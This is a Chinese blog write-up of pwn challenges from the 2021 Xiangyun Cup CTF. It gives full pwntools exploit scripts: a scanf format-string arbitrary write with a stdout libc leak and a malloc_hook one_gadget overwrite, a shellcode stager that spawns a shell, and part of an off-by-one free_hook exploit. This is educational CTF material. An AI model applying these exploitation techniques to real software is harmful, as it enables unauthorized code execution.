【pwn】2021 祥云杯 (部分)

最新推荐文章于 2022-10-14 19:54:24 发布
最新推荐文章于 2022-10-14 19:54:24 发布
阅读量4.2k 收藏 6
点赞数 7
分类专栏: 与君共勉 pwn 文章标签: pwn ctf wp
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/woodwhale/article/details/120635062
版权

【pwn】2021 祥云杯 (部分)

前言

国庆的最后几天,一直在补题,发现祥云杯那个时候一道堆题都不会,直接开始补题。

补题过程中,发现自己还是太菜了,对着师傅们的wp都有些不明白.jpg

1、note

这应该是祥云杯里最简单的题目了QAQ。但是之前没有学过IO,参考一位师傅写的这篇博客,pwn题堆利用的一些姿势 – IO_FILE

image-20211007113856091

漏洞点在于scanf的格式化字符串,可以任意位置写。发现stack中有_IO_2_1_stdout_那么,我们写入p64(0xfbad1800) + p64(0)*3来泄露libc,最后再用scanf的任意写,向malloc_hook中写入one_gadget,用realloc_hook调栈帧,从而getshell

image-20211007104607121

exp如下

def cmd(idx):
    sla(":",str(idx))

def add(size,content="a"):
    cmd(1)
    sla(":",str(size))
    sla(":",content)
    ru("0x")
    return(i16(r(12)))

def say(buf,content):
    cmd(2)
    sa("?",buf)
    sla("?",content)


say(b"%7$s",p64(0xfbad1800) + p64(0)*3)
libc.address = uu64(ru(b"\x7f",False)[-6:])-(0x7f2ee70626e0-0x7f2ee6c9f000)
leak("libc_base",libc.address)

malloc_hook = libc.sym["__malloc_hook"]
realloc_hook = malloc_hook-0x8
realloc = libc.sym['realloc']
ogs = og(libc.path)[1] + libc.address
leak("malloc_hook",malloc_hook)

say(b"%7$saaaa"+p64(realloc_hook),p64(ogs)+p64(realloc+0x8))
# dbg()
cmd(1)
sla(":","10")

ia()

image-20211007104851876

2、JigSaw’sCage

这题首先需要得到一个具有可执行权限的chunk,通过v1的整数溢出来将v2改写

image-20211007105316505

然后就是申请堆块写入shellcode,一段shellcode的最大长度为0x10

看了很多wp,有分很多小段写入shellcode的师傅,也有通过非常精妙的寄存器执行read函数再来执行的sh()的shellcode,这里用wjh师傅的超短shellcode

我们注意到test函数就是执行我们写入堆中的shellcode,并且是通过call rdx来调用,这里的rdx就是heap的地址,并且在call之前是将eax置为0了,而read函数的系统调用号也是0。

image-20211007105842179

所以我们只需要来构建一个read(0,heap,0x1000),就可以向heap段写入0x1000大小的内容,并且具有可执行权限,所以直接向其中输入shellcraft.sh()就可以了,在这之前使用nop滑梯就完成了!

shellcode = '''
xor rdi, rdi
mov rsi, rdx
mov rdx, 0x1000
syscall
'''
# shellcode 最长0x10,	充分利用调用时各个寄存器的值
# 程序使用了 call rdx ,这里 rdx 为 heap 段地址,并且 eax 给置 0 
# 进行 0 号系统调用 read 读到我们正在执行的 heap 中0x1000大小

完整exp如下:

sla("Name:","woodwhale")
sla("Make your Choice:",str(u64(p32(0)+p32(15))))

# add 0
sla("Choice : ","1")
sla("Index? : ","0")

shellcode = '''
xor rdi, rdi
mov rsi, rdx
mov rdx, 0x1000
syscall
'''
shellcode = asm(shellcode)

# edit 0
sla("Choice : ","2")
sla("Index? : ","0")
sla("iNput:",shellcode)

# test 0
sla("Choice : ","4")
sla("Index? : ","0")

# get shell
sl(b'\x90' * 0x10 + asm(shellcraft.sh()))
# dbg()
ia()

image-20211007110415606

3、PassWordBox_FreeVersion

这题的话,有一个加密操作,用key和咱们box中的content进行xor加密,如果我们的content为空,那么就会输出key

image-20211007110754734

这里用到add()函数中的一个off by one漏洞,真的是显而易见

image-20211007111027142

因为这题的edit函数只能操作一次,所以我们需要给到一个free_chunk的fd指针改为一个hook

image-20211007111111672

那么我们只能通过堆叠的操作来得到free_hook,并向其中写入system,最后free(“sh”)就能getshell了

完整exp如下:

# leak key
add("a",0x18,"\x00"*8+"\n") # 0
ru(" Save ID:")
key = uu64(r(8))
leak("key",key)

# 构造堆叠
add("1",0xf0,"\x00"*8+"\n") # 1
add("2",0x80,"\x00"*8+"\n") # 2
add("3",0x80,"\x00"*8+"\n") # 3
add("4",0xf0,"\x00"*8+"\n") # 4

for i in range(5,
最低0.47元/天 解锁文章
woodwhale
关注
专栏目录
WP-2021祥云
ce666666的博客
01-16 679
前言 好多审计题,懒狗的我,自愧不如。赛后借助各位师傅的wp进行复现,不会的题目赛后加强学习知识点,盲看没什么用。 链接 复现平台:https://buuoj.cn/ 参考大佬博客:https://www.anquanke.com/post/id/251221 WEB ezyii 这题就是网上有的yii链子,1day好像。利用这个https://xz.aliyun.com/t/9948#toc-6直接拿。  代码 <?php namespace Codeception\Extension{ u
2021祥云
qq_48511129的博客
12-13 1089
安全检测 尝试用admin/admin登录,发现成功登录 输入一个百度的地址,发现跳转到了百度。 于是尝试能不能跳转到本地http://127.0.0.1发现无法跳转 网站很多都有一个admin后台目录,接着尝试能不能跳转到该目录 发现成功跳转 看到include123.php文件,于是接着跳转到该文件下面 发现了一些php代码 发现对get传的参数过滤了很多东西。本地文件包含,远程文件包含命令执行等基本都过滤了。 暑假做题的时候做到了一道类似的题,把这些都过滤了,他用的方法是用session文件包含,因为
2021 祥云 pwn note
yongbaoii的博客
08-30 342
保护全开 功能1 可以申请chunk,然后会给chunk地址。 功能2 功能2有一个scanf的任意写。 功能3是一个输出。 利用的就是scanf的任意写。 我们知道scanf会把我们的输入的字符串当成第一个参数,如果还有需要,会先从五个寄存器去找,然后再去找栈中的数据,那我们也去看一下寄存器或者栈上的数据有没有可以利用的。 偏移8的地方显然有一个_IO_2_1_stdout_地址,所以我们可以把他当作参数做一个任意写,劫持_IO_FILE然后泄露libc,再来一次把malloc_hook地址写上去,
2021祥云部分pwn
weixin_46521144的博客
09-03 666
note 格式化字符串 本题考查了scanf的格式化字符串利用。一般我们用的都是printf的格式化字符串。这里是scanf 踩坑 一开始没有注意到sendline会多发一个换行符,导致往栈上$7的stdout写入的时候老是写不对,结果发现是多发了。 scanf的格式化字符利用方式和printf的比较类似,就是不能直接输出。这里注意到栈上有stdout,可以直接往里面写入绕过判断输出libc_info的fbad1800。 step1 获取libc payload1 = p64(0xfbad1800)+p6
2021 祥云 pwn JigSaw‘sCage
yongbaoii的博客
08-30 271
显然全绿。 libc给的是2.31的 进场画面简洁。 E9这个函数。 5148开了个空间,然后栈上写了个名字。 15f0这个函数首先引入眼帘的是 sysconf这个函数。 干嘛的? sysconf 函数用来获取系统执行的配置信息。例如页大小、最大页数、cpu个数、打开句柄的最大个数等等 我们在输入v1的时候可以看到,类型是ld,但是我们的v1只有四个字节,那么就会溢出4个字节给v2,那么就可以得到一块rwx的内存。地址就是我们的heap的地址。 add 就是申请 0x10的chunk。 edit 编写
pwn2021 东华部分)
woodwhale的博客
10-31 3638
pwn2021 东华部分) 1、cpp1 典中典之堆溢出,改俩堆块重叠进入unsorted bin,然后申请其中一个回来,就能泄露libc。 之后就是堆溢出改fd为free_hook写入system #!/usr/bin/python # -*- coding: UTF-8 -*- # ----------------------------------- # @File : exp.py # @Author : woodwhale # @Time : 2021/10/31 12
赣网2021_pwn1.rar
12-11
赣网2021 pwn1 bin ctf
pwn2021 鹤壁 wp
woodwhale的博客
10-09 3761
pwn2021 鹤壁 wp 前言 这场比较简单,但是也看到了自己急于求成的下场,基础知识非常不牢固,很多调试手段都太拉了,逆向能力也是非常差,还是得跟着师傅们继续学啊! 1、ret2libc1 就是最简单的ret2libc1,好像还有后门,我给忘了 2、ret2libc3 也是基本的ret2libc3,puts.plt泄露puts.got从而泄露libc.address,system(“sh”) 要注意一下栈平衡,在rop之前加个ret 3、onecho 这题,虽然很简单,但是我太拉了,不会动调,导致
pwn2021 绿城部分
woodwhale的博客
10-04 3552
pwn2021 绿城部分) 前言 补题,这场没报名,比赛的时候机房唯一报名的战队pwn穿了(tql),就没去做了 1、uaf_pwn 简单的uaf,free之后之后没有置0,直接申请unsorted bin泄露libc,再double free改malloc_hook写入one_gadget exp如下 def add(size): sla(">","1") sla("size>",str(size)) def free(index): sla("&gt
2021 祥云 pwn-note
z1r0的博客
10-14 374
在第一个图那里下个断点,查看stack时发现%11$p这里有一个stdout,这个给了我们泄露libc的机会,我们可以打stdout的flag和write_ptr,具体的可以看别的师傅对stdout泄露libc分析的文章。偏移为7, 这里笔者用的ubuntu20.04的2.31libc做的,不需要利用realloc来调整可以直接利用,题目给的libc需要利用realloc来调整一下即可。拿到libc之后,算出ogg,ogg出来了,可以再利用scanf任意地址写打malloc为ogg。
2021祥云部分wp
m0_51357657的博客
08-24 896
祥云2021 目前只做了两道题(没办法 tcl。。。 MISC-鸣雏恋 下载下来是个word,打开只有一句话 不太对劲,放到010里看一看发现文件头50 4B 03 04 经典压缩包了,文件后缀改成zip,解压 得到一个txt和加密压缩包,文件打开感觉什么都没有。。。 但仔细看,第二行可显示字符没有190,所以是零宽度字符隐写 vim 一下,果然 放到在线网站上解一下 压缩包解完有129488张图片,两种图片代表01,转成二进制 二进制转换成ASCII码之后,发现是个base64转png 接下
[祥云2021Wp]
qq_42906381的博客
08-24 413
MISC新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Markdown编辑器, 可以仔细阅读这篇文章,了解一下Markdown的基本语
2021祥云web 部分wp
fmyyy1的博客
08-23 778
ezyii 说是最新的链子,题目把文件都筛选好了让我们找。写一下我的思路 看到RunProcess类 <?php namespace Codeception\Extension; class RunProcess { protected $output; protected $config = ['sleep' => 0]; protected static $events = []; private $processes = []; publ
2021祥云 CTF pwnwp
qq_39948058的博客
08-26 1217
前言:题都不难,我好气,这次被大佬带飞,队里的pwn手都是神级别的,这里出了三道题,如果我不是sha,我应该能出五道,可是我好菜,这里贴出一下 note: 思路:自己构建格式化字符串漏洞,自己打,先打IO——stdout,泄露libc基地址,再打的是reallochook为onegadget,然后进行申请获取rce exp: #coding:utf-8 from pwn import * context.log_level = "debug" p = process("./note") libc =
祥云2021 Web简单题wp
feng的博客
08-23 600
前言 千言万语汇成一句:我真是太菜了。事实证明只会个php在卷成这样的ctf比赛里面只能挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打。 不会Java和js直接下线,只能卑微的做最简单题
2021 祥云 RE dizzy WP
AlwaysBetter
08-28 368
这道题 其实是一道模拟题 作者估计也没想到 被hexRay背刺了 大概思想是模拟了 加 减 异或三种运算 可惜模拟的子片段能被hexRay识别并分析,导致把maxFunSize参数上限调高后,ida直接把运算式生成了: byte_43841C[6] += byte_43841C[3]; byte_43841C[10] -= byte_43841C[27]; byte_43841C[10] += byte_43841C[6]; byte_43841C[14] += byte_43841C[3]; byte_
[祥云2021]几道简单题的wp
Huamang的博客
08-22 4327
ezyii https://xz.aliyun.com/t/9948 找yii链子打,开局就给了反序列化,看了一下是文章里面的第四条链子 exp <?php namespace Codeception\Extension{ use Faker\DefaultGenerator; use GuzzleHttp\Psr7\AppendStream; class RunProcess{ protected $output; private $proc
2021第二届“祥云”网络安全大赛 部分Writeup
qq_42815161的博客
08-23 3488
MISC ChieftainsSecret 题目描述:Our agent risked his life to install a mysterious device in the immemorial telephone, can you find out the chieftain's telephone number? Flag format: flag{11 digits} ChieftainsSecret.jpg题目附件给了一张老式轮盘电话机图片,猜测图片藏了东西,直接上linux分
2023 羊城 pwn
最新发布
01-02
2023年的羊城pwn比赛将是一场精彩的技术对决。作为网络安全领域的顶尖比赛之一,羊城吸引了来自全球各地的顶尖选手参与。比赛将涉及各种pwn技术,包括堆溢出、格式化字符串漏洞、内存泄露等。参赛选手需要展示出...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值